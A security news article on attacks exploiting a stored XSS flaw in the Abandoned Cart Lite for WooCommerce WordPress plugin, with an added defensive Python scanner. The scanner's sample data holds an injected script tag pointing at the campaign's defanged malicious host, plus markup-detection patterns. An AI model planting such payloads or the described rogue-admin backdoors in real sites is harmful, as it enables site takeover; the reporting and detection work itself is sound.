Abandoned Cart for WooCommerce WordPress Plugin Exploited in Attacks
Unpatched versions of the Abandoned Cart for WooCommerce plugin for WordPress have been exploited in attacks, researchers say. Apparently, there’s a dangerous XSS (cross-site scripting) vulnerability in the plugin which affects both paid and free versions of the plugin.
Last month, a stored cross-site scripting (XSS) flaw was patched in version 5.2.0 of the popular WordPress plugin Abandoned Cart Lite For WooCommerce, said Wordfence researchers.
How is the attack carried out? Cybercriminals create a cart with fake contact information and then abandon it. According to the report, the names and emails are random, but the requests follow the same pattern: the generated first and last name are supplied together as billing_first_name, while the billing_last_name field contains the injected payload.
The bit.ly shortener used in these attacks resolves to hXXps://cdn-bigcommerce[.]com/visionstat.js.
It should be noted that two backdoors are deployed in the attacks: a rogue administrator account is created, and a deactivated plugin is infected with a code execution script. Both of these actions are executed by creating a hidden iframe in the admin’s existing browser window, then simulating the process of filling out and submitting the necessary forms within it, researchers said.
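The pattern above (a full name in billing_first_name, markup in billing_last_name, a known script host) can be checked for directly in stored cart data, and the flaw itself is closed by escaping the value before it reaches the admin page. The following is an added illustration, not code from the plugin or from Wordfence; the record layout and field names are an assumption based on the article, and the sample carts are constructed.

```python
import html
import re

# Known indicator from the report, kept defanged; used only for matching.
KNOWN_IOCS = ("cdn-bigcommerce[.]com", "cdn-bigcommerce.com")

# Markup that has no business in a billing name field.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z][^>]*>|javascript:|on[a-z]+\s*=", re.IGNORECASE)

# Constructed sample records shaped after the billing fields named in the article
# (assumption: the real plugin's storage layout differs; only the field names are from the report).
SAMPLE_CARTS = [
    {"id": 101, "billing_first_name": "Alice", "billing_last_name": "Smith",
     "billing_email": "alice@example.com"},
    {"id": 102, "billing_first_name": "Tarq Vendel",
     "billing_last_name": "<script src=\"https://cdn-bigcommerce[.]com/visionstat.js\"></script>",
     "billing_email": "tvendel@example.net"},
    {"id": 103, "billing_first_name": "Bob", "billing_last_name": "O'Neil",
     "billing_email": "bob@example.org"},
]


def field_findings(name, value):
    """Return the reasons a single billing field looks like injected content."""
    reasons = []
    if MARKUP_RE.search(value):
        reasons.append(f"{name}: HTML/JS markup in a name field")
    if any(ioc in value for ioc in KNOWN_IOCS):
        reasons.append(f"{name}: references known campaign indicator")
    return reasons


def scan_carts(carts):
    """Flag carts whose billing fields carry markup or a known indicator, and note
    the reported pattern: a two-word first name beside a payload-bearing last name."""
    findings = []
    for cart in carts:
        reasons = []
        for name in ("billing_first_name", "billing_last_name", "billing_email"):
            reasons += field_findings(name, cart.get(name, ""))
        two_word_first = len(cart.get("billing_first_name", "").split()) >= 2
        if reasons and two_word_first and MARKUP_RE.search(cart.get("billing_last_name", "")):
            reasons.append("matches reported pattern: full name in first_name, payload in last_name")
        if reasons:
            findings.append({"id": cart["id"], "reasons": reasons})
    return findings


def render_safe(value):
    """Output-side mitigation: escape the stored value before it is placed in admin HTML."""
    return html.escape(value, quote=True)
```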
Researchers have detected 5,251 accesses to the bit.ly link associated with the attacks.